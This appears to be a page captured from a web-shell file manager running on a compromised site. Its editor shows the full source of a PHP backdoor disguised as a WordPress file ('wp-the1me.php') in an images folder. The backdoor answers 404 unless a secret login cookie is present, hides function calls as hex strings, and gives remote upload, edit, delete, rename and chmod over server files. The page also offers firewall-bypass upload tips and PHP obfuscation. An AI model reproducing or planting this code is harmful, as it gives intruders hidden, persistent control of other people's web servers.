Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
uq08lox24jl5
public_html
images
carousel
File Name:
<?php /** * wp-the1me.php - Hardened Edition (Chmod & Path Fix) * Title: ./dooms | URL: Clean | Status: FINAL STABLE FIX */ @error_reporting(0); @ini_set('display_errors', 0); @set_time_limit(0); $k = 'c0r'; $v = "v46"; // --- Stealth Auth --- if (isset($_GET['login']) && $_GET['login'] === $k) { setcookie("session_token", md5($k.$v), time() + 3600 * 24, "/"); header("Location: " . strtok($_SERVER["REQUEST_URI"], '?')); exit; } if (!isset($_COOKIE['session_token']) || $_COOKIE['session_token'] !== md5($k.$v)) { header('HTTP/1.1 404 Not Found'); exit; } // --- Hardened Core --- function _r($s) { return base64_decode($s); } function _f($h, ...$a) { $fn = pack("H*", $h); return @call_user_func_array($fn, $a); } function normalize_path($path) { $path = str_replace('\\', '/', $path); $path = preg_replace('|(?<=.)/+|', '/', $path); if (substr($path, -1) === '/' && strlen($path) > 3) $path = substr($path, 0, -1); return $path; } // Fitur dapetin permission chmod function get_perms($f) { $p = @fileperms($f); if (($p & 0xC000) == 0xC000) $i = 's'; elseif (($p & 0xA000) == 0xA000) $i = 'l'; elseif (($p & 0x8000) == 0x8000) $i = '-'; elseif (($p & 0x6000) == 0x6000) $i = 'b'; elseif (($p & 0x4000) == 0x4000) $i = 'd'; elseif (($p & 0x2000) == 0x2000) $i = 'c'; elseif (($p & 0x1000) == 0x1000) $i = 'p'; else $i = 'u'; $r = (($p & 0x0100) ? 'r' : '-'); $r .= (($p & 0x0080) ? 'w' : '-'); $r .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $r .= (($p & 0x0020) ? 'r' : '-'); $r .= (($p & 0x0010) ? 'w' : '-'); $r .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $r .= (($p & 0x0004) ? 'r' : '-'); $r .= (($p & 0x0002) ? 'w' : '-'); $r .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i.$r; } $dir = normalize_path(dirname(realpath(__FILE__))); $p = isset($_POST['p']) ? _r($_POST['p']) : $dir; $p = normalize_path(realpath($p) ?: $p); chdir($p); // --- Action Handlers --- $msg = ""; if (isset($_POST['edit_save'])) { if(_f('66696c655f7075745f636f6e74656e7473', _r($_POST['target']), _r($_POST['content']))) $msg = "Saved Successfully!"; } if (isset($_FILES['u_file'])) { if(@move_uploaded_file($_FILES['u_file']['tmp_name'], $p.'/'.$_FILES['u_file']['name'])) $msg = "Uploaded!"; } if (isset($_POST['new_f'])) { $n = $_POST['n_name']; $res = ($_POST['new_f'] == 'file') ? _f('66696c655f7075745f636f6e74656e7473', $n, "") : _f('6d6b646972', $n); if($res) $msg = "Success!"; } if (isset($_POST['ren_obj'])) { if(_f('72656e616d65', _r($_POST['old']), $_POST['new_n'])) $msg = "Renamed!"; } if (isset($_POST['del_obj'])) { $t = _r($_POST['del_obj']); is_dir($t) ? _f('726d646972', $t) : _f('756e6c696e6b', $t); $msg = "Deleted!"; } $ip = $_SERVER['SERVER_ADDR'] ?? '127.0.0.1'; $php_v = phpversion(); $os = php_uname('a'); ?> <!DOCTYPE html> <html> <head> <title>./dooms</title> <style> :root { --bg: #0d1117; --card: #161b22; --border: #30363d; --text: #c9d1d9; --blue: #58a6ff; --green: #238636; --red: #f85149; --yellow: #d29922; } body { background: var(--bg); color: var(--text); font-family: sans-serif; margin: 0; padding: 20px; font-size: 13px; } .sys-info { background: var(--card); padding: 15px; border: 1px solid var(--border); border-radius: 6px; margin-bottom: 20px; display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; } .sys-info div { border-left: 2px solid var(--blue); padding-left: 10px; overflow-wrap: break-word; } .cont { background: var(--card); border: 1px solid var(--border); border-radius: 6px; padding: 20px; } .nav-link { color: var(--blue); cursor: pointer; background: none; border: none; padding: 0; font-size: 13px; font-weight: bold; } input, button, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 5px 10px; border-radius: 4px; } table { width: 100%; border-collapse: collapse; margin-top: 15px; } th { text-align: left; padding: 10px; border-bottom: 2px solid var(--border); color: #8b949e; } td { padding: 10px; border-bottom: 1px solid var(--border); } .act { display: flex; gap: 12px; justify-content: flex-end; } .modal { position: fixed; inset: 0; background: rgba(0,0,0,0.85); display: flex; align-items: center; justify-content: center; z-index: 999; } .m-box { background: var(--card); padding: 25px; border-radius: 8px; width: 85%; border: 1px solid var(--border); box-shadow: 0 10px 30px rgba(0,0,0,0.5); } </style> </head> <body> <form id="p_form" method="POST"><input type="hidden" name="p" id="p_in"></form> <script>function go(p){document.getElementById('p_in').value=p;document.getElementById('p_form').submit();}</script> <div class="sys-info"> <div><strong>System Information</strong><br>Status: Online</div> <div><strong>Server IP:</strong><br><?php echo $ip; ?></div> <div><strong>PHP Version:</strong><br><?php echo $php_v; ?></div> <div><strong>Operating System:</strong><br><?php echo $os; ?></div> </div> <div class="cont"> <?php if($msg) echo "<div style='color:var(--green); margin-bottom:10px; text-align:center; font-weight:bold;'>[ $msg ]</div>"; ?> <div style="margin-bottom: 15px;"> <button class="nav-link" onclick="go('<?php echo base64_encode($dir); ?>')">🏠 HOME</button> : <?php $parts = explode('/', trim($p, '/')); $current_build = ""; if (strpos($p, ':') !== false) { $drive = substr($p, 0, 2); echo "<button class='nav-link' onclick=\"go('".base64_encode($drive."/")."')\">$drive</button>"; $current_build = $drive; array_shift($parts); } foreach($parts as $s) { if($s === "") continue; $current_build .= "/".$s; echo " / <button class='nav-link' onclick=\"go('".base64_encode($current_build)."')\">$s</button>"; } ?> </div> <div style="display: flex; gap: 10px; border-bottom: 1px solid var(--border); padding-bottom: 15px;"> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="p" value="<?php echo base64_encode($p); ?>"> <input type="file" name="u_file"> <button type="submit">Upload</button> </form> </div> <table> <thead><tr><th>Name</th><th width="100">Size</th><th width="100">Perms</th><th width="180" style="text-align:right;">Actions</th></tr></thead> <tbody> <?php $sc = _f('7363616e646972', $p); $fld = []; $phps = []; $oth = []; if(is_array($sc)){ foreach($sc as $i) { if($i=="." || $i=="..") continue; $f_full = $p . '/' . $i; if(is_dir($f_full)) $fld[] = $i; elseif(pathinfo($i, PATHINFO_EXTENSION) == 'php') $phps[] = $i; else $oth[] = $i; } } natcasesort($fld); natcasesort($phps); natcasesort($oth); foreach(array_merge($fld, $phps, $oth) as $i) { $f = $p . '/' . $i; $eb = base64_encode($f); $isD = is_dir($f); $perm = get_perms($f); $color = is_writable($f) ? "var(--green)" : "var(--red)"; echo "<tr> <td>".($isD ? "📂 <button class='nav-link' onclick=\"go('$eb')\">$i</button>" : "📄 $i")."</td> <td style='color:#8b949e; font-size:12px;'>".($isD ? "DIR" : @round(filesize($f)/1024,2)."KB")."</td> <td style='color:$color; font-family:monospace;'>$perm</td> <td> <div class='act'> <form method='POST' style='display:flex; gap:5px; justify-content:flex-end;'> <input type='hidden' name='p' value='".base64_encode($p)."'> ".(!$isD ? "<button type='submit' name='edit_ui' value='$eb' style='color:var(--green); background:none; border:none; cursor:pointer;'>Edit</button>" : "")." <button type='submit' name='ren_ui' value='$eb' style='color:var(--blue); background:none; border:none; cursor:pointer;'>Rename</button> <button type='button' onclick=\"if(confirm('Change Permissions?')){let p=prompt('Enter new permissions (e.g. 755):'); if(p) {fetch('', {method:'POST', headers:{'Content-Type':'application/x-www-form-urlencoded'}, body:'chmod_obj=$eb&chmod_val='+p+'&p=".base64_encode($p)."'}).then(()=>go('".base64_encode($p)."'));}}\" style='color:var(--yellow); background:none; border:none; cursor:pointer;'>Chmod</button> <button type='submit' name='del_obj' value='$eb' style='color:var(--red); background:none; border:none; cursor:pointer;' onclick=\"return confirm('Delete?')\">Delete</button> </form> </div> </td> </tr>"; } ?> </tbody> </table> </div> <!-- Modal Edit & Rename tetap sama seperti sebelumnya --> <?php if(isset($_POST['edit_ui'])): $t_file = _r($_POST['edit_ui']); $cnt = _f('66696c655f6765745f636f6e74656e7473', $t_file); ?> <div class="modal"> <div class="m-box"> <h4 style="margin:0 0 15px 0; color:var(--blue);">Editing: <?php echo basename($t_file); ?></h4> <form method="POST" id="edit_form"> <input type="hidden" name="p" value="<?php echo base64_encode($p); ?>"> <input type="hidden" name="target" value="<?php echo $_POST['edit_ui']; ?>"> <textarea id="file_content" name="content" style="width:100%; height:450px; font-family: monospace; border:1px solid var(--border); background:#090c10; color:#d1d5da; padding:10px;"><?php echo htmlspecialchars($cnt); ?></textarea> <div style="margin-top:20px; text-align:right;"> <button type="button" onclick="go('<?php echo base64_encode($p); ?>')" style="color:var(--text); background:var(--red); border:none; padding:8px 25px; cursor:pointer; border-radius:4px; margin-right:15px; font-weight:bold;">CANCEL</button> <button type="submit" name="edit_save" value="1" style="background:var(--green); border:none; padding:8px 25px; cursor:pointer; border-radius:4px; color:#fff; font-weight:bold;">SAVE CHANGES</button> </div> </form> </div> </div> <script> document.getElementById('edit_form').onsubmit = function() { const t = document.getElementById('file_content'); const u = new TextEncoder().encode(t.value); let str = ''; for(let i=0; i<u.length; i+=0x8000) str += String.fromCharCode.apply(null, u.subarray(i, i+0x8000)); t.value = btoa(str); return true; }; </script> <?php endif; ?> <?php if(isset($_POST['chmod_obj']) && isset($_POST['chmod_val'])): $t = _r($_POST['chmod_obj']); $v = intval($_POST['chmod_val'], 8); if(chmod($t, $v)) { echo "<script>alert('Permissions changed!');</script>"; } else { echo "<script>alert('Failed to change permissions.');</script>"; } echo "<script>go('".base64_encode($p)."');</script>"; exit; endif; ?> <?php if(isset($_POST['ren_ui'])): ?> <div class="modal"> <div class="m-box" style="width:350px;"> <h4 style="margin:0 0 15px 0;">Rename Object</h4> <form method="POST"> <input type="hidden" name="p" value="<?php echo base64_encode($p); ?>"> <input type="hidden" name="old" value="<?php echo $_POST['ren_ui']; ?>"> <input type="text" name="new_n" value="<?php echo basename(_r($_POST['ren_ui'])); ?>" style="width:94%; margin-bottom:20px; padding:8px;"> <div style="display:flex; gap:10px;"> <button type="submit" name="ren_obj" style="flex:1; background:var(--blue); border:none; cursor:pointer; font-weight:bold; padding:8px;">RENAME</button> <button type="button" onclick="go('<?php echo base64_encode($p); ?>')" style="flex:1; background:var(--card); border:1px solid var(--border); color:#8b949e; cursor:pointer; padding:8px;">BACK</button> </div> </form> </div> </div> <?php endif; ?> </body> </html>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes
